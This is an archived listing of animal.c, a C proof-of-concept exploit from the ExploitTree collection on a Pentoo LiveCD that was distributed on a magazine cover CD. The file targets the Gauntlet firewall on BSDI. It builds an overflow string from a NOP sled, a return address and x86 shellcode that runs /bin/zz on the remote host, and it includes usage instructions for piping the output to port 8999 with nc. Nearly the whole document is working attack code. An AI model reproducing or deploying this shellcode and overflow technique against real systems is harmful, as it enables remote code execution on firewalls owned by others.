Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / bsd / remote / animal.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 1KB | 62 lines

/* * Animal.c * * * Remote Gauntlet BSDI proof of concept exploit. * Garrison technologies may have found it, but I am the * one who released it. ;) I do not have a Sparc or I would * write up the Solaris one too. If you have one, please * make the changes needed and post it. Thanks. * * Script kiddies can go away, this will only execute a file * named /bin/zz on the remote firewall. To test this code, * make a file named /bin/zz and chmod it to 700. * I suggest for the test you just have the zz file make a note * in syslog or whatever makes you happy. * * This code is intened for proof of concept only. * * * _Gramble_ * Hey BuBBles * *To use: * # Animal | nc <address> 8999 */ #include <stdio.h> char data[364]; main() { int i; char shelloutput[80]; /* just borrowed this execute code from another exploit */ unsigned char shell[] = "\x90" "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00"; for(i=0;i<264;i++) data[i]=0x90; data[i]=0x30;i++; data[i]=0x9b;i++; data[i]=0xbf;i++; data[i]=0xef;i++; data[i] = 0x00; for (i=0; i<strlen(shell); i++) shelloutput[i] = shell[i]; shelloutput[i] = 0x00; printf("10003.http://%s%s", data, shelloutput); }